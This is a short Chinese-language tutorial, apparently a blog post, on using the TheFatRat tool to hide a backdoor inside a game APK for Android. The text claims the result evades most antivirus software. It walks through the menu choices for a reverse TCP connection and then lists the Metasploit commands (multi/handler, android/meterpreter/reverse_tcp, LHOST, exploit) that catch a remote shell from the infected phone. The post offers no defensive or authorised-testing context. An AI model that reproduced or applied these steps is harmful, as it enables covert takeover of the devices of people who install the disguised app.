TheFatRat是一個大規模的開發工具、也是功能非常強大的自動化滲透工具。
版本階段構建一個簡單的工具來生成後門和簡單的工具來張貼攻擊攻擊,如瀏覽器攻擊,DLL。該工具使用流行的有效負載編譯惡意軟件,然後編譯後的惡意軟件可以在windows,android,mac上執行。使用此工具創建的惡意軟件也有能力繞過大多數AV軟件保護。TheFatRat安裝好以後
在這裏我們選擇第五個、意思是生成一個apk的後門,就是android的app。
點擊回車
配置我們的本地IP地址,和監聽的端口。以及放置遊戲apk文件的地址
設置好本地IP地址,和監聽的端口。以及放置遊戲apk文件的地址,如上圖出現1-6選項,我們選擇3生成一個tcp的反彈鏈接。
然後選擇2配置生成後門,我們可以看到已經有後門程序的總覽。
然後在這裏選擇y ,下一步輸入配置文件的名字(可以隨便起一個)
這樣木馬就生成了,在home/Thefatrat/backdoored目錄下
啓動msf,配置監聽模塊,反彈鏈接,攻擊機IP地址,監聽端口,執行攻擊exploit。如圖所示
在kali的命令行中輸入msfconsole 來啓動msf 啓動後如圖
配置監聽模塊,反彈鏈接,攻擊機IP地址,監聽端口,執行攻擊exploit,
命令如下
use exploit/multi/handler //加載模塊
set payload android/meterpreter/reverse_tcp //設置一個安卓tcp反彈
set LHOST IP // 設置攻擊者的IP地址
exploit //監聽與攻擊